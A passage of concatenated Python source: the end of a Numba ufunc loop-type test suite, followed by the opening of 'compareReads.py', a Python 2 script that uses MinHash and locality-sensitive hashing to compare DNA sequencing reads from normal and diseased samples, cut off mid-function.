def _arg_for_type(self, a_letter_type, index=0):
res = super(self.__class__, self)._arg_for_type(a_letter_type,
index=index)
if a_letter_type in 'bBhHiIlLqQ' and index == 1:
# For integer power, avoid a negative exponent, as it triggers
# undefined behavior that may differ in results from Numba
# to the compiler used to compile NumPy
res[res < 0] = 3
return res
TestLoopTypesPowerNoPython.autogenerate()
class TestLoopTypesIntLeftShiftNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.left_shift]
_required_types = 'bBhHiIlLqQ'
_skip_types = 'fdFDmMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
res = super(self.__class__, self)._arg_for_type(a_letter_type,
index=index)
# Shifting by a negative amount (argument with index 1) is undefined
# behavior in C. It is also undefined behavior in numba. In the same
# sense, it is also undefined behavior when the shift amount is larger
# than the number of bits in the shifted integer.
# To avoid problems in the test, the values are clamped (clipped) so
# that 0 <= shift_amount < bitcount(shifted_integer)
if index == 1:
bit_count = res.dtype.itemsize * 8
res = np.clip(res, 0, bit_count-1)
return res
TestLoopTypesIntLeftShiftNoPython.autogenerate()
class TestLoopTypesIntRightShiftNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.right_shift]
_required_types = 'bBhHiIlLqQ'
_skip_types = 'fdFDmMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
res = super(self.__class__, self)._arg_for_type(a_letter_type,
index=index)
# Shifting by a negative amount (argument with index 1) is undefined
# behavior in C. It is also undefined behavior in numba. In the same
# sense, it is also undefined behavior when the shift amount is larger
# than the number of bits in the shifted integer.
# To avoid problems in the test, the values are clamped (clipped) so
# that 0 <= shift_amount < bitcount(shifted_integer)
if index == 1:
bit_count = res.dtype.itemsize * 8
res = np.clip(res, 0, bit_count-1)
# Right shift has "implementation defined behavior" when the number
# shifted is negative (in C). In numba, right shift for signed integers
# is "arithmetic" while for unsigned integers is "logical".
# This test compares against the NumPy implementation, that relies
# on "implementation defined behavior", so the test could be a false
# failure if the compiler used to compile NumPy doesn't follow the same
# policy.
# Hint: do not rely on right shifting negative numbers in NumPy.
if index == 0:
res = np.abs(res)
return res
TestLoopTypesIntRightShiftNoPython.autogenerate()
class TestLoopTypesFloorDivideNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.floor_divide, np.remainder, np.divmod]
_required_types = 'bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
def _fixup_results(self, dtype, py_arg, c_arg):
if dtype.kind == 'f':
# Discrepancies on floating-point floor division and remainder:
# Numpy may return nan where Numba returns inf, e.g. 1. // 0.
pred = (np.isinf(c_arg) & np.isnan(py_arg))
# Numpy and Numba may differ in signed zeros, e.g. -0. // -1.
pred |= (py_arg == 0.0) & (c_arg == 0.0)
c_arg[pred] = py_arg[pred]
return py_arg, c_arg
TestLoopTypesFloorDivideNoPython.autogenerate()
class TestLoopTypesFloatNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
if iswindows:
_ufuncs.remove(np.signbit) # TODO: fix issue #758
_ufuncs.remove(np.floor_divide) # has its own test class
_ufuncs.remove(np.remainder) # has its own test class
_ufuncs.remove(np.divmod) # has its own test class
_ufuncs.remove(np.mod) # same as np.remainder
_required_types = 'fd'
_skip_types = 'FDmMO' + _LoopTypesTester._skip_types
TestLoopTypesFloatNoPython.autogenerate()
class TestLoopTypesComplexNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
# Test complex types
# Every loop containing a complex argument must be tested
_required_types = 'FD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
TestLoopTypesComplexNoPython.autogenerate()
class TestLoopTypesDatetimeNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
_ufuncs.remove(np.divmod) # not implemented yet
# NOTE: the full list of ufuncs supporting datetime64 and timedelta64
# types in Numpy is:
# ['absolute', 'add', 'divide', 'equal', 'floor_divide', 'fmax', 'fmin',
# 'greater', 'greater_equal', 'less', 'less_equal', 'maximum',
# 'minimum', 'multiply', 'negative', 'not_equal', 'sign', 'subtract',
# 'true_divide']
# Test datetime64 and timedelta64 types.
_required_types = 'mM'
# Test various units combinations (TestLoopTypes is only able to test
# homogeneous units).
def test_add(self):
ufunc = np.add
fn = _make_ufunc_usecase(ufunc)
# heterogeneous inputs
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'm8[s]'])
# heterogeneous inputs, scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', 'm8[ms]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'm8[ms]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'm8[m]'])
def test_subtract(self):
ufunc = np.subtract
fn = _make_ufunc_usecase(ufunc)
# heterogeneous inputs
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[s]', 'M8[m]', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', 'm8[s]'])
# heterogeneous inputs, scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[s]', 'M8[m]', 'm8[ms]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', 'm8[ms]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', 'm8[m]'])
def test_multiply(self):
ufunc = np.multiply
fn = _make_ufunc_usecase(ufunc)
# scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[us]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['q', 'm8[s]', 'm8[us]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[m]'])
def test_true_divide(self):
ufunc = np.true_divide
fn = _make_ufunc_usecase(ufunc)
# heterogeneous inputs
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', 'd'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', 'd'])
# scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'q', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'd', 'm8[s]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[m]'])
def test_floor_divide(self):
ufunc = np.floor_divide
fn = _make_ufunc_usecase(ufunc)
# scaled output
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'q', 'm8[s]'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'd', 'm8[s]'])
# Cannot upscale result (Numpy would accept this)
with self.assertRaises(LoweringError):
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'q', 'm8[m]'])
def _check_comparison(self, ufunc):
fn = _make_ufunc_usecase(ufunc)
# timedelta
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[m]', 'm8[s]', '?'])
self._check_ufunc_with_dtypes(fn, ufunc, ['m8[s]', 'm8[m]', '?'])
# datetime
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[m]', 'M8[s]', '?'])
self._check_ufunc_with_dtypes(fn, ufunc, ['M8[s]', 'M8[m]', '?'])
def test_comparisons(self):
for ufunc in [np.equal, np.not_equal, np.less, np.less_equal,
np.greater, np.greater_equal]:
self._check_comparison(ufunc)
TestLoopTypesDatetimeNoPython.autogenerate()
class TestUFuncBadArgsNoPython(TestCase):
_compile_flags = no_pyobj_flags
def test_missing_args(self):
def func(x):
"""error: np.add requires two args"""
result = np.add(x)
return result
self.assertRaises(TypingError, compile_isolated, func, [types.float64],
return_type=types.float64, flags=self._compile_flags)
def test_too_many_args(self):
def func(x, out, out2):
"""error: too many args"""
result = np.add(x, x, out, out2)
return result
array_type = types.Array(types.float64, 1, 'C')
self.assertRaises(TypingError, compile_isolated, func, [array_type] *3,
return_type=array_type, flags=self._compile_flags)
def test_no_scalar_result_by_reference(self):
def func(x):
"""error: scalar as a return value is not supported"""
y = 0
np.add(x, x, y)
self.assertRaises(TypingError, compile_isolated, func, [types.float64],
return_type=types.float64, flags=self._compile_flags)
class TestUFuncCompilationThreadSafety(TestCase):
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #2403).
"""
errors = []
@vectorize
def foo(x):
return x + 1
def wrapper():
try:
a = np.ones((10,), dtype = np.float64)
expected = np.ones((10,), dtype = np.float64) + 1.
np.testing.assert_array_equal(foo(a), expected)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
class TestUfuncOnContext(TestCase):
def test_cpu_get_ufunc_info(self):
# The CPU context defines get_ufunc_info that is the same as
# ufunc_db.get_ufunc_info.
targetctx = cpu_target.target_context
# Check: get_ufunc_info returns a dict
add_info = targetctx.get_ufunc_info(np.add)
self.assertIsInstance(add_info, dict)
# Check: it is the same as ufunc_db.get_ufunc_info
expected = ufunc_db.get_ufunc_info(np.add)
self.assertEqual(add_info, expected)
# Check: KeyError raised on bad key
badkey = object()
with self.assertRaises(KeyError) as raises:
ufunc_db.get_ufunc_info(badkey)
self.assertEqual(raises.exception.args, (badkey,))
def test_base_get_ufunc_info(self):
# The BaseContext always raises NotImplementedError
targetctx = BaseContext(cpu_target.typing_context, 'cpu')
with self.assertRaises(NotImplementedError) as raises:
targetctx.get_ufunc_info(np.add)
self.assertRegex(
str(raises.exception),
r"<numba\..*\.BaseContext object at .*> does not support ufunc",
)
if __name__ == '__main__':
unittest.main()
|
compareReads.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Lars Andersen <larsmew@gmail.com>"
__date__ = "19/05/2015"
__version__ = "$Revision: 2.5"
from optparse import OptionParser
from operator import itemgetter
from collections import Counter, deque
from itertools import chain
from multiprocessing import Pool, Queue, Process
import sys, time, os
import random
import copy
import json, csv
import cPickle as pickle
import shelve
import resource
import ntpath
import tarfile
""" global variables """
# LSH
leftPartRatio = 0.5
rightPartRatio = 0.5
printMinhashProcess = 5000000
setVersion = False
# Sequence Alignment
M1 = 1
M2 = 2
secondSample = 0
overlap = 8 # Overlap region in both directions i.e. 20 overlap in total if 10
maxAlignments = 1 # per read
requiredOverlaps = 4
maxCandMates = 5000
MUTFIND = 1
p_id = -1
# Test variables
c1 = 0
c2 = 0
c3 = 0
c4 = 0
c5 = 0
c6 = 0
c7 = 0
c8 = 0
numreadL = 0
numreadR = 0
# ************************************************************************** #
# #
# Helpers #
# #
# ************************************************************************** #
def optionParse():
"""
Parse arguments from command line.
"""
desc = """Compare sets of sequencing data to find mutations."""
parser = OptionParser(usage="usage: %prog --fasta_file filename",
description=desc,
version="%prog version 2.0")
parser.add_option("-f", "--fasta_file",
metavar="<FILENAME>",
default="../Data/Fasta/reads.fa",
action="store",
dest="fasta_file",
help="set <FILENAME> as fasta file.")
parser.add_option("-n", "--normal",
metavar="<FILENAME>",
action="store",
dest="normal_file",
help="set <FILENAME> as normal reads sample.")
parser.add_option("-d", "--diseased",
metavar="<FILENAME>",
action="store",
dest="diseased_file",
help="set <FILENAME> as diseased reads sample.")
parser.add_option("-i", "--candidate_pairs",
metavar="<FILENAME>",
type=str,
action="store",
dest="input",
help="set <FILENAME> as input file containing \
candidate pairs to import.")
parser.add_option("-e", "--export_candidate_pairs",
metavar="<FILENAME>",
type=str,
action="store",
dest="output",
help="set <FILENAME> as output file to export \
candidate pairs to. Dump as either txt, json, \
pickle or csv file. Just put the right extension\
and everything else is automated.")
parser.add_option("-l", "--log_file",
metavar="<FILENAME>",
type=str,
default="log.txt",
action="store",
dest="log",
help="set <FILENAME> as log file.")
parser.add_option("-k", "--k_size",
metavar="<VALUE>",
type=int,
default=12,
action="store",
dest="k",
help="set <VALUE> as size for k-shingles.")
parser.add_option("-t", "--threshold",
metavar="<VALUE>",
type=float,
default=float(2)/3,
action="store",
dest="threshold",
help="set <VALUE> as threshold similarity.")
parser.add_option("-b", "--bands",
metavar="<Value>",
type=int,
default=25,
action="store",
dest="bands",
help="set <VALUE> as the number of bands for LSH.")
parser.add_option("-r", "--rows",
metavar="<Value>",
type=int,
default=40,
action="store",
dest="rows",
help="set <VALUE> as the number of rows for LSH.")
parser.add_option("-x", "--similarity_measure",
metavar="<VALUE>",
type=str,
default="naive",
action="store",
dest="sim",
help="set <VALUE> as similairy measure to use (obsolete).")
parser.add_option("-m", "--minhash_alg",
metavar="<VALUE>",
type=int,
default="6",
action="store",
dest="m",
help="<VALUE> defines the minhash algorithm to use.")
parser.add_option("-s", "--seed",
metavar="<VALUE>",
type=int,
default=42,
action="store",
dest="s",
help="set <VALUE> as seed for hash functions.")
parser.add_option("-T", "--test",
metavar="<VALUE>",
type=int,
action="store",
dest="T",
help="perform test <VALUE>.")
parser.add_option("-S", "--supporting_reads",
metavar="<VALUE>",
type=int,
default=3,
action="store",
dest="S",
help="Reads required to support mutation.")
parser.add_option("-o", "--mismatch_overlap",
metavar="<VALUE>",
type=int,
default=1,
action="store",
dest="o",
help="Number of allowed mismatches in overlap.")
parser.add_option("-g", "--mismatch_group",
metavar="<VALUE>",
type=int,
default=2,
action="store",
dest="g",
help="Number of allowed mismatches in group.")
(options, args) = parser.parse_args()
global requiredOverlaps
requiredOverlaps = options.S
global M1
M1 = options.o
global M2
M2 = options.g
return options.fasta_file, options.normal_file, options.diseased_file,\
options.k, options.threshold, options.bands, options.rows,\
options.m, options.s, options.log, options.input, options.output,\
options.T
def memory_usage_resource():
"""
Computes the ressource usage (in MB) at a given time during runtime.
Computes total amount used so far, so not the amount currently in use.
"""
rusage_denom = 1024.
if sys.platform == 'darwin':
# ... it seems that in OSX the output is different units ...
rusage_denom = rusage_denom * rusage_denom
mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
return mem
def logprint(log_file, flush, *output):
"""
Prints to standard out and to log file
"""
log_output = ""
log_output = " ".join(map(str, output))
print log_output
if log_file:
log_file.write(log_output + "\n")
if flush:
log_file.flush()
def exportCandidatePairs(candidatePairs, output_file, log, numReads=None):
"""
Export candidate pairs to a file.
The type of file is determined on the provided filename for output_file.
Supported filetypes: txt, json, pickle (python) and csv.
"""
tim = time.clock()
# Output file extension
ext = output_file.rsplit(".", 1)
# default to txt if no extension provided
if len(ext) == 0:
ext = "txt"
output_file += ".txt"
else:
ext = ext[1]
# save set information - However, more space consuming
# and not needed. Hence, this should never be used.
if ext == "set_pickle":
with open(output_file, "w") as f:
pickle.dump(candidatePairs, f)
elif ext == "json":
with open(output_file, "w") as f:
if isinstance(candidatePairs[0], set):
for id1 in candidatePairs:
candidatePairs[id1] = list(candidatePairs[id1])
json.dump(candidatePairs, f)
elif ext == "pickle":
with open(output_file, "w") as f:
if isinstance(candidatePairs[0], set):
for id1 in candidatePairs:
candidatePairs[id1] = list(candidatePairs[id1])
pickle.dump(candidatePairs, f)
elif ext == "txt":
with open(output_file, "w") as f:
for id1 in candidatePairs:
f.write(str(id1)+"\t")
#sortedElements = sorted(list(candidatePairs[id1]))
sortedElements = list(candidatePairs[id1])
for id2 in sortedElements[:-1]:
f.write(str(id2)+",")
if len(sortedElements) > 0:
f.write(str(sortedElements[-1])+"\n")
# Test-only write the first numReads reads to output file.
elif ext == "temp":
with open(output_file, "w") as f:
for id1 in xrange(numReads):
f.write(str(id1)+"\t")
#sortedElements = sorted(list(candidatePairs[id1]))
#print sortedElements
if id1 in candidatePairs:
sortedElements = list(candidatePairs[id1])
for id2 in sortedElements[:-1]:
f.write(str(id2)+",")
if len(sortedElements) > 0:
f.write(str(sortedElements[-1]))
f.write("\n")
elif ext == "txt2":
with open(output_file, "w") as f:
for id1 in candidatePairs:
for id2 in candidatePairs[id1]:
f.write(str(id1)+"\t"+str(id2)+"\n")
elif ext == "csv":
w = csv.writer(open(output_file+".csv", "w"))
for key, val in candidatePairs.items():
w.writerow([key, val])
# Else export to whatever filename that is provided in the format
# used for txt files.
else:
output_file += ".txt"
with open(output_file, "w") as f:
for id1 in candidatePairs:
f.write(str(id1)+"\t")
sortedElements = list(candidatePairs[id1])
for id2 in sortedElements[:-1]:
f.write(str(id2)+",")
f.write(str(sortedElements[-1])+"\n")
logprint(log, False, "Exported candidate pairs to", output_file,
"in", time.clock()-tim, "seconds")
def importCandidatePairs(input_file, log):
"""
Import candidate pairs from a file.
Supported filetypes: txt, json, pickle (python) and csv.
"""
tim = time.clock()
logprint(log, True, "Importing candidate pairs...")
candidatePairs = dict()
# Input file extension
ext = input_file.rsplit(".", 1)
if len(ext) == 0:
ext = "txt"
input_file += ".txt"
else:
ext = ext[1]
if ext == "set_pickle":
with open(input_file, "r") as f:
candidatePairs = pickle.load(f)
logprint(log, False, "pickle-set:", time.clock()-tim)
elif ext == "json":
with open(input_file, "r") as f:
candidatePairs = json.load(f)
logprint(log, False, "json:", time.clock()-tim)
elif ext == "pickle":
with open(input_file, "r") as f:
candidatePairs = pickle.load(f)
logprint(log, False, "pickle-list:", time.clock()-tim)
elif ext == "txt":
with open(input_file, "r") as f:
imported = 0
for line in f:
elements = line.split()
key = int(elements[0])
pairs = map(int, elements[1].split(','))
candidatePairs[key] = pairs
imported += len(pairs)
# print elements
# print key
# print pairs
# print candidatePairs[key]
# sys.exit()
logprint(log, False, "Imported", imported/2, "candidate pairs from",
input_file, "in", time.clock()-tim, "seconds.")
elif ext == "txt2":
with open(input_file, "r") as f:
for line in f:
elements = map(int, line.split())
if elements[0] in candidatePairs:
candidatePairs[elements[0]].append(elements[1])
else:
candidatePairs[elements[0]] = [elements[1]]
logprint(log, False, "txt2 file:", time.clock()-tim)
elif ext == "csv":
for key, val in csv.reader(open(input_file)):
if key in candidatePairs:
candidatePairs[key].append(val)
else:
candidatePairs[key] = [val]
logprint(log, False, "csv:", time.clock()-tim)
else:
logprint(log, True, "File format is not supported for input file."
"Please specify file format (extension) as either txt,",
"json, pickle or csv.")
sys.exit()
# Print imported candidate pairs
# for id1 in candidatePairs:
# print id1
# print candidatePairs[id1]
# sys.exit()
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return candidatePairs
# ************************************************************************** #
# #
# Pre-computations #
# #
# ************************************************************************** #
def computeHashFunctions(n, shingles, log):
"""
Computes n lists of shuffled elements from 1..#shingles.
These lists represents the hash functions needed for LSH.
"""
# Create n different permutations (hash functions) of the shingles
tim = time.clock()
hashfuncs = []
for i in xrange(n):
h = range(len(shingles))
random.shuffle(h)
hashfuncs.append(h)
# print h,"\n"
logprint(log, False, "Computed hashfunctions in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return hashfuncs
def computeShinglesTable(fasta_file, shinglesPos, k, log):
"""
Computes a table for fast look-up of k-shingles and their corresponding
position in the reads - when it was first encountered in the fasta file.
"""
if not fasta_file:
return shinglesPos
logprint(log, True, "Computing table of shingles positions...")
tim = time.clock()
with open(fasta_file, "rU") as fasta_file:
#shinglesPos = dict()
read = ""
pos = 0
for line in fasta_file:
# If line starts with ">", which indicates end of a sequence
# Then, append it to list of reads
if line.startswith(">"):
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
pos += 1
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
pos += 1
if len(leftpart) < k:
logprint(log, False,
"ERROR: k larger than part length\n",
" Pick k smaller than", len(leftpart)
)
sys.exit()
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
# Compute shingles from last read
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
pos += 1
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
if shingle not in shinglesPos:
shinglesPos[shingle] = pos
#pos += 1
logprint(log, False, "Finished computation of shingles table in",
(time.clock() - tim) / 60, "minutes")
logprint(log, False, "Number of shingles:", len(shinglesPos))
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return shinglesPos
def computeShinglesSet(fasta_file, shingles, k, log):
"""
Computes the set of all k-shingles (k-mers) in all reads.
"""
if not fasta_file:
return shingles
logprint(log, True, "Computing set of all shingles...")
tim = time.clock()
with open(fasta_file, "rU") as fasta_file:
#shingles = set()
read = ""
for line in fasta_file:
# If line starts with ">", which indicates end of a sequence
# Then, append it to list of reads
if line.startswith(">"):
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
shingles.add(shingle)
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
shingles.add(shingle)
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
# Compute shingles from last read
if read != "":
# Splits the string into two parts
leftpart = read[:len(read)/2]
for shingle in getDocShingles(leftpart, k):
shingles.add(shingle)
rightpart = read[len(read)/2:]
for shingle in getDocShingles(rightpart, k):
shingles.add(shingle)
logprint(log, False, "Finished shingling in", (time.clock() - tim) /
60, "minutes")
logprint(log, False, "Number of shingles:", len(shingles))
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return shingles
def getAllReads(fasta_file, log, parts=True):
if fasta_file:
reads = []
ext = fasta_file.rsplit(".", 1)[1]
if ext == "fasta" or ext == "fa":
with open(fasta_file, "r") as f:
reads = parseFasta(fasta_file, f, log, parts)
elif ext == "fastq":
with open(fasta_file, "r") as f:
reads = parseFastq(fasta_file, f, log, parts)
elif ext == "gz" or ext == "tar":
tar = tarfile.open(fasta_file, "r")
for file in tar.getmembers():
ext = file.name.rsplit(".", 1)
if len(ext) > 1:
ext = file.name.rsplit(".", 1)[1]
else:
continue
print ext
if ext == "fasta":
f = tar.extractfile(file)
reads += parseFasta(fasta_file, f, log, parts)
elif ext == "fastq":
f = tar.extractfile(file)
reads += parseFastq(fasta_file, f, log, parts)
else:
print "File format", "*"+ext+"*", "is NOT supported. Use FASTA",
print "or FASTQ, possibly compressed as tar.gz."
sys.exit()
return reads
else:
return []
def parseFastq(filename, fasta_f, log, parts=True):
read = ""
tim = time.clock()
logprint(log, False, "Collecting reads from file", filename)
reads = []
seqs = 0
seq_line = False
for line in fasta_f:
# If line starts with ">", which indicates end of a sequence, append it to list of reads
if line.startswith("@"):
seq_line = True
elif line.startswith("+"):
if read != "":
seqs += 1
if parts:
# Splits the string into two parts
leftpart = read[:len(read)/2]
rightpart = read[len(read)/2:]
reads.append(leftpart)
reads.append(rightpart)
else:
reads.append(read)
read = ""
seq_line = False
elif seq_line:
# Concatenate multi-line sequences into one string
read += line.strip().upper()
logprint(log, False, "Finished reading in", (time.clock() - tim) / 60, "minutes")
logprint(log, False, "Found", seqs, "sequences in fasta file")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return reads
def parseFasta(filename, fasta_f, log, parts=True):
"""
Extract the reads (DNA sequences) from the given fasta file.
Splits the reads into two equally (for now) sized parts.
"""
read = ""
tim = time.clock()
logprint(log, False, "Collecting reads from file", filename)
reads = []
seqs = 0
for line in fasta_f:
# If line starts with ">", which indicates end of a sequence,
# append it to list of reads
if line.startswith(">"):
if read != "":
seqs += 1
if parts:
# Splits the string into two parts
leftpart = read[:len(read)/2]
rightpart = read[len(read)/2:]
reads.append(leftpart)
reads.append(rightpart)
else:
reads.append(read)
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
if read != "":
seqs += 1
if parts:
leftpart = read[:len(read)/2]
rightpart = read[len(read)/2:]
reads.append(leftpart)
reads.append(rightpart)
else:
reads.append(read)
logprint(log, False, "Finished reading in",
(time.clock() - tim) / 60, "minutes")
logprint(log, False, "Found", seqs, "sequences in fasta file")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
return reads
def getPartsFromFile(fasta_file, log):
"""
Makes a generator object of all left- and right-parts of all reads
in the given fasta file.
"""
if fasta_file:
with open(fasta_file, "r") as fasta_file:
read = ""
for line in fasta_file:
# If line starts with ">", which indicates end of a sequence, append it to list of reads
if line.startswith(">"):
if read != "":
# Splits the string into two parts
leftpart = read[:int(len(read)*leftPartRatio)]
yield leftpart
rightpart = read[int(len(read)*rightPartRatio):]
yield rightpart
read = ""
# Concatenate multi-line sequences into one string
else:
read += line.strip().upper()
if read != "":
leftpart = read[:int(len(read)*leftPartRatio)]
yield leftpart
rightpart = read[int(len(read)*rightPartRatio):]
yield rightpart
def getPrime(offset):
"""
Finds the first prime number higher than a given offset.
"""
def isPrime(n):
"""
Checks if the given number (n) is a prime number.
"""
if n == 2 or n == 3: return True
if n < 2 or n % 2 == 0: return False
if n < 9: return True
if n % 3 == 0: return False
r = int(n**0.5)
f = 5
while f <= r:
if n % f == 0: return False
if n % (f+2) == 0: return False
f += 6
return True
start = random.randrange(100)
# print "start", start
offset += start
if offset % 2 == 0:
offset += 1
while True:
if isPrime(offset):
return offset
offset += 2
# ************************************************************************** #
# #
# Locality Sensitive Hashing #
# #
# ************************************************************************** #
def doWork(tup, b=None, q=None):
if b > 12:
#time.sleep(9000)
#time.sleep(b)
time.sleep(18000)
if b != None:
normal, diseased, shingles, k, rows, min_alg, bands, p = tup
else:
normal, diseased, shingles, k, rows, min_alg, b, bands, p = tup
print b
seqs = getAllReads(normal, None) + getAllReads(diseased, None)
#r = redis.StrictRedis()
buckets = dict()
#candidatePairs = dict()
num = minhashing(normal, diseased, shingles, buckets, k, rows,
min_alg, b, bands, p, None)
numPairs = lshBandMultiCore(buckets, b, seqs, None, q)
#numPairs = 0
#for key in candidatePairs:
#r.rpush(key, candidatePairs[key])
#pre = "redis-cli SADD "+str(key)+" "
#cmd = pre+" ".join(map(str,candidatePairs[key]))
#os.system(cmd+" > /dev/null")
#numPairs += len(candidatePairs[key])
#val = ','.join(map(str, candidatePairs[key]))
#r.sadd(key,candidatePairs[key])
# lst = [i for i in xrange(1000)]
# for i in xrange(100):
# r.rpush(i, lst)
print "Num buckets", len(buckets)
#exportCandidatePairs(candidatePairs, filename, None, num)
#multiSeqAlign(normal, diseased, b, bands, prefix, suffix, num)
#return buckets
#sys.exit()
return None
def runLSH(normal, diseased, bands, rows, k, seed, minhash_alg, test, log, multiProcessing, pool):
"""
Minhash algorithms:
pre-computed hash functions:
1. First hash
2. Through whole matrix (according to the book)
3. Through all documents shingles
Ongoing hash functions in the form ((ax+b) mod p) mod N:
4. First hash
5. Through whole matrix (according to the book)
6. Through all documents shingles
"""
# Check if files are provided
if normal or diseased:
tim = time.clock()
random.seed(seed)
candidatePairs = dict()
# getAllReads(normal, log)
# sys.exit()
if minhash_alg == 7:
p = getPrime(4**k)
shingles = None
# Computes table of all k-shingles and their position
elif minhash_alg == 3 or minhash_alg == 6:
# shingles = computeShinglesTable(fasta_file, k, log)
shingles = dict()
shingles = computeShinglesTable(normal, shingles, k, log)
shingles = computeShinglesTable(diseased, shingles, k, log)
# p = getPrime(len(shingles))
p = 0
# Computes set of all k-shingles
else: # minhash alg 1, 2, 4 or 5
# shingles = computeShinglesSet(fasta_file, k, log)
shingles = set()
shingles = computeShinglesSet(normal, shingles, k, log)
shingles = computeShinglesSet(diseased, shingles, k, log)
shingles = list(shingles)
#p = getPrime(len(shingles))
p = 0
# Use Locality-Sensitive Hashing to compute for each bands the buckets
# with similar documents (reads) obtained by minhashing each read.
if not multiProcessing:
# seqs = getAllReads(normal, None) + getAllReads(diseased, None)
for b in xrange(bands):
buckets = dict()
minhashing(normal, diseased, shingles, buckets, k, rows,
minhash_alg, b, bands, p, log)
logprint(log, False, "Number of buckets", len(buckets))
lshBand(buckets, b, candidatePairs, log)
# Stop if memory limit reached
# limit = memory_usage_resource()
# if int(limit) > 300000:
# break
if multiProcessing:
if pool:
numProcs = 3
start = numProcs if numProcs <= bands else bands
prev_start = 0
stop = bands
while True:
params = []
for b in xrange(prev_start, start):
params.append( (normal, diseased, shingles, k, rows,
minhash_alg, b, bands, p) )
prev_start = start
results = pool.map(doWork, params)
tim = time.clock()
logprint(log, False, "Combining candidate pairs...")
for tempDict in results:
#for _ in xrange(bands):
#tempDict = results.get()
for key in tempDict:
if key in candidatePairs:
for item in tempDict[key]:
candidatePairs[key].add(item)
else:
candidatePairs[key] = set(tempDict[key])
logprint(log, False,
"Finished combining candidate pairs in",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
start += numProcs
if start > bands:
start = bands
if prev_start == bands:
break
else:
q = Queue()
#seqs = getAllReads(normal, log) + getAllReads(diseased, log)
params = (normal, diseased, shingles, k, rows,
minhash_alg, bands, p)
numProcs = 25
start = numProcs if numProcs <= bands else bands
prev_start = 0
stop = bands
count = 0
while True: #start < stop+1:
#processes = []
for b in xrange(prev_start, start):
p = Process(target=doWork, args=(params, b, q, ))
p.start()
#processes.append(p)
prev_start = start
# pipe = r.pipeline()
tim = time.clock()
logprint(log, False, "Combining candidate pairs...")
#d = shelve.open("shelveDBs/cache0")
results = 0
while count < start:
key, mates = q.get()
#time.sleep(0.1)
if key == -1:
count += 1
print "Done bands:", count
else:
if key not in candidatePairs:
